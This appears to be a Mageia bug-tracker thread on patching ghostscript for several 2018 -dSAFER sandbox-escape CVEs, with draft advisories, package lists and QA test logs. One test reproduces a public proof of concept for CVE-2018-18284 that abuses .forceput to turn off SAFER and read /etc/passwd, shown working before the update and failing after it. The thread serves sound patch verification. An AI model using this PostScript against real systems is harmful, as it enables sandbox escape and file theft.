Bug 23659

Bug 23526, our previous update, didn't mention:
CVE-2018-11645
CVE-2018-16585
CVE-2018-17183

Ubuntu has issued advisories for those on September 19 and October 1:
https://usn.ubuntu.com/3768-1/
https://usn.ubuntu.com/3773-1/

Assigning to all packagers collectively, since there is no registered maintainer for this package.
Also CC'ing two committers.

CC: (none) => marja11, nicolas.salguero, smelror
Assignee: bugsquad => pkg-bugs

Suggested advisory:
========================

The updated packages fix many bugs and a security vulnerability:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/09/4
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.mga6
ghostscript-dvipdf-9.25-1.mga6
ghostscript-common-9.25-1.mga6
ghostscript-X-9.25-1.mga6
ghostscript-module-X-9.25-1.mga6
lib(64)gs9-9.25-1.mga6
lib(64)gs-devel-9.25-1.mga6
lib(64)ijs1-0.35-140.mga6
lib(64)ijs-devel-0.35-140.mga6
ghostscript-doc-9.25-1.mga6

from SRPMS:
ghostscript-9.25-1.mga6.src.rpm

Status: NEW => ASSIGNED
Version: Cauldron => 6
Whiteboard: MGA6TOO => (none)

What about Comment 1?

Keywords: (none) => feedback

(In reply to David Walser from comment #4)
> What about Comment 1?

According to MITRE:
- CVE-2018-11645: Ghostscript before 9.21rc1
- CVE-2018-16585: Ghostscript before 9.24
- CVE-2018-17183: Ghostscript before 9.25 but the commit linked to that CVE was already in our ghostscript-9.24 package.

Thanks!

Keywords: feedback => (none)

One more commit is necessary:
https://www.openwall.com/lists/oss-security/2018/10/11/3

Keywords: (none) => feedback

And yet another needed commit with a new CVE:
https://www.openwall.com/lists/oss-security/2018/10/10/12

Summary: ghostscript new security issue CVE-2018-17961 => ghostscript new security issue CVE-2018-17961 and CVE-2018-18073

Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.1.mga6
ghostscript-dvipdf-9.25-1.1.mga6
ghostscript-common-9.25-1.1.mga6
ghostscript-X-9.25-1.1.mga6
ghostscript-module-X-9.25-1.1.mga6
lib(64)gs9-9.25-1.1.mga6
lib(64)gs-devel-9.25-1.1.mga6
lib(64)ijs1-0.35-140.1.mga6
lib(64)ijs-devel-0.35-140.1.mga6
ghostscript-doc-9.25-1.1.mga6

from SRPMS:
ghostscript-9.25-1.1.mga6.src.rpm

Mageia 6, x86_64
Topped up the pre-update packages.

Before update:

CVE-2018-17961
https://www.openwall.com/lists/oss-security/2018/10/10/12
$ gs -dSAFER -sDEVICE=ppmraw
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- {--dup-- null --ne-- {--exec-- true} {--pop-- false} --ifelse--} null 2 --%stopped_push-- -file- {prompt {(%statementedit)
[...]
null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1916 1 3 --%oparray_pop-- {-dict- /FontDirectory --.currentglobal-- {-dict-} {/LocalFontDirectory --.systemvar--} --ifelse-- --.forceput-- --pop--}]
GS>quit

Quoting the reference above:
"Once you have a reference to forceput, you can do anything you like, see
the exploit for CVE-2018-18073 as an example of abusing forceput to get
arbitrary filesystem access."
I could not find that exploit but updating solved the problem.

Waiting for the mirrors to sync.  Tested the earlier update.  When the new files appear I will run through the same tests again and report any differences in behaviour.    
After the first update you can access the error stack safely:
$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>{ null .setglobal } stopped clear
GS>$error /estack get ==
[--%interp_exit-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- --.setglobal-- --%loop_continue-- --.setglobal-- --.setglobal-- false 1 --%stopped_push-- .runexec2 -file- --.setglobal-- null 2 --%stopped_push-- -file- false 1 --%stopped_push-- 1920 1 3 --%oparray_pop-- --.setglobal--]
GS>

Ran a few simple tests of gs.
Displayed a postscript file.
$ gs abc-0.ps
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
Querying operating system for font files...
Can't find (or can't open) font file /usr/share/ghostscript/9.25/Resource/Font/BorzoiRegular.
Can't find (or can't open) font file BorzoiRegular.
Loading BorzoiRegular font from /home/lcl/.local/share/fonts/BorzoiRegular.pfb... 4495204 2874741 3183244 1851046 3 done.
>>showpage, press <return> to continue<<

GS>quit

LibreOffice has ghostscript support.
The same file displayed OK with that.
Browsed an e-book pdf file with gs, hitting return to turn the pages.  On quit it insisted on flicking through the rest of the 832 pages.

Converted a dvi file to a pdf.
$ dvipdf refcard.dvi refcard.pdf
dvips: Font cmbx10 at 13824 not found; scaling 600 instead.
dvips: Such scaling will generate extremely poor output.
Page 1 may be too complex to print
Page 2 may be too complex to print
Page 5 may be too complex to print
Page 6 may be too complex to print
Warning:  no %%Page comments generated.

In fact it reproduced perfectly in okular - no loss of quality.

Looks OK for 64-bits.

CC: (none) => tarazed25

CVE-2018-18073 has reserved status; no details of possible exploits available.

Passing it on.

Whiteboard: (none) => MGA6-64-OK

Ugh, another commit is needed for CVE-2018-18284:
https://www.openwall.com/lists/oss-security/2018/10/16/2

Can we add it in?

Suggested advisory:
========================

The updated packages fix many bugs and security vulnerabilities:

Bypassing executeonly to escape -dSAFER sandbox. (CVE-2018-17961)

Saved execution stacks can leak operator arrays. (CVE-2018-18073)

1Policy operator gives access to .forceput. (CVE-2018-18284)

References:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18073
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18284
https://www.openwall.com/lists/oss-security/2018/10/09/4
https://www.openwall.com/lists/oss-security/2018/10/11/3
https://www.openwall.com/lists/oss-security/2018/10/10/12
https://www.openwall.com/lists/oss-security/2018/10/16/2
========================

Updated packages in core/updates_testing:
========================
ghostscript-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
lib(64)gs9-9.25-1.2.mga6
lib(64)gs-devel-9.25-1.2.mga6
lib(64)ijs1-0.35-140.2.mga6
lib(64)ijs-devel-0.35-140.2.mga6
ghostscript-doc-9.25-1.2.mga6

from SRPMS:
ghostscript-9.25-1.2.mga6.src.rpm

ghostscript-9.25-1.1.mga6

CVE-2018-18284

Tried out the commands given at https://www.openwall.com/lists/oss-security/2018/10/16/2

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
GS>systemdict /userparams get /PermitFileControl [(*)] .forceput
GS>systemdict /userparams get /PermitFileWriting [(*)] .forceput
GS>systemdict /userparams get /PermitFileReading [(*)] .forceput
GS>(/etc/passwd) (r) file 1024 string readline pop ==
(root:x:0:0:root:/root:/bin/bash)(root:x:0:0:root:/root:/bin/bash)
GS>quit

The new version is not on the mirrors yet.  Later.

Updated the packages.
$ rpm -qa | grep ghostscript
ghostscript-9.25-1.2.mga6
ghostscript-module-X-9.25-1.2.mga6
ghostscript-dvipdf-9.25-1.2.mga6
ghostscript-common-9.25-1.2.mga6
ghostscript-X-9.25-1.2.mga6

$ gs -dSAFER -sDEVICE=ppmraw
GPL Ghostscript 9.25 (2018-09-13)
Copyright (C) 2018 Artifex Software, Inc.  All rights reserved.
This software comes with NO WARRANTY: see the file PUBLIC for details.
GS>/.forceput { <<>> <<>> 4 index (ignored) 5 index 5 index .policyprocs 1
get exec pop pop pop pop pop pop pop } def
GS>systemdict /SAFER false .forceput
Error: /undefined in .policyprocs
Operand stack:
   --dict:963/1684(ro)(G)--   SAFER   false   --dict:0/0(L)--   --dict:0/0(L)--   --dict:963/1684(ro)(G)--   (ignored)   SAFER   false
Execution stack:
   %interp_exit   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--   %loop_continue   --nostringval--   --nostringval--   false   1   %stopped_push   .runexec2   --nostringval--   --nostringval--   --nostringval--   2   %stopped_push   --nostringval--   --nostringval--
Dictionary stack:
   --dict:963/1684(ro)(G)--   --dict:0/20(G)--   --dict:79/200(L)--
Current allocation mode is local
Last OS error: No such file or directory
Current file position is 34

Any further attempts to use systemdict are thwarted in the same way.
Good result.

Ran simple tests again.  Printed a postscript file.  It looks fine.

Whiteboard: (none) => MGA6-64-OK

Looks good to me, after Len's tests. Validating. Correct (I think) advisory suggestion in Comment 13.

Keywords: (none) => validated_update
CC: (none) => andrewsfarm, sysadmin-bugs

An update for this issue has been pushed to the Mageia Updates repository.

https://advisories.mageia.org/MGASA-2018-0408.html

Resolution: (none) => FIXED
Status: ASSIGNED => RESOLVED